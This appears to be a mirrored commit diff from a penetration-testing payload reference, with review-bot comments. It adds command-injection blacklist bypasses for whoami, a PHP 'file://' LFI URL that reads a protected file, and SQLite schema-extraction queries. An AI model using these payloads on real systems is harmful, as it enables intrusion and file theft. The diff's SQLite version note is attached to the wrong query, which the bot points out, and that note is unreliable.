mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 11:46:14 +02:00
Compare commits
6 Commits
e26831d06c
...
6145d1a987
Author | SHA1 | Date | |
---|---|---|---|
n3rada | 6145d1a987 | ||
Swissky | 80dda8beeb | ||
Swissky | 8ef458db2a | ||
mohnad banat | d834abe43c | ||
xplo1t-sec | 033982dc30 | ||
n3rada | d658aa026a |
|
@ -18,6 +18,7 @@
|
|||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||
* [Bypass with single quote](#bypass-with-single-quote)
|
||||
* [Bypass with double quote](#bypass-with-double-quote)
|
||||
* [Bypass with backticks](#bypass-with-backticks)
|
||||
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
|
||||
* [Bypass with $@](#bypass-with-)
|
||||
* [Bypass with $()](#bypass-with--1)
|
||||
|
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash
|
|||
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
||||
```powershell
|
||||
wh``oami
|
||||
```
|
||||
|
||||
#### Bypass with backslash and slash
|
||||
|
|
|
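Review bot: The new "Bypass with backticks" block (and the quote blocks around it) is fenced as `powershell`, but the hunk context (`root:x:0:0:root:/root:/bin/bash`) shows this part of the page is about a Unix shell. In PowerShell the backtick is the escape character, so `wh``oami` does not behave there as it does in sh/bash, where an empty pair of backticks is an empty command substitution. Suggest tagging these fences `bash` and adding one sentence under the new heading saying why the shell still resolves the command name, so the section is not a bare payload.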
@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
|
|||
|
||||
## LFI / RFI using wrappers
|
||||
|
||||
### Wrapper file://
|
||||
It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
|
||||
|
||||
```shell
|
||||
http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
|
||||
```
|
||||
Note that using `localhost` above bypasses `file:///` filtering.
|
||||
|
||||
### Wrapper php://filter
|
||||
|
||||
The part "`php://filter`" is case insensitive
|
||||
|
@ -623,4 +631,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
|||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
|
||||
|
|
|
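Review bot: The last reference line (the wrapwrap entry) shows up as both the removed and the added line with identical visible text, so this looks like a whitespace or end-of-file newline change only. Please confirm that is intended and that the rendered list does not end up with the entry twice. The new `file://` wrapper section added in this file has no entry in the references; if it came from a write-up, add it here.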
@ -33,7 +33,10 @@ select sqlite_version();
|
|||
```sql
|
||||
SELECT sql FROM sqlite_schema
|
||||
```
|
||||
|
||||
if sqlite_version > 3.33.0
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master
|
||||
```
|
||||
## Integer/String based - Extract table name
|
||||
|
||||
```sql
|
||||
|
|
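Review bot: The condition "if sqlite_version > 3.33.0" is attached to the wrong query. `sqlite_schema` is the name introduced in SQLite 3.33.0, while `sqlite_master` is the legacy name that works on every version, so as written the page tells readers to use the old name on new versions and gives no fallback for old ones. Suggest putting the version note on the `sqlite_schema` block (3.33.0 and later) and labelling `sqlite_master` as the form for earlier versions. There is also no blank line between the closing fence of the new block and the `## Integer/String based - Extract table name` heading, which some Markdown renderers need.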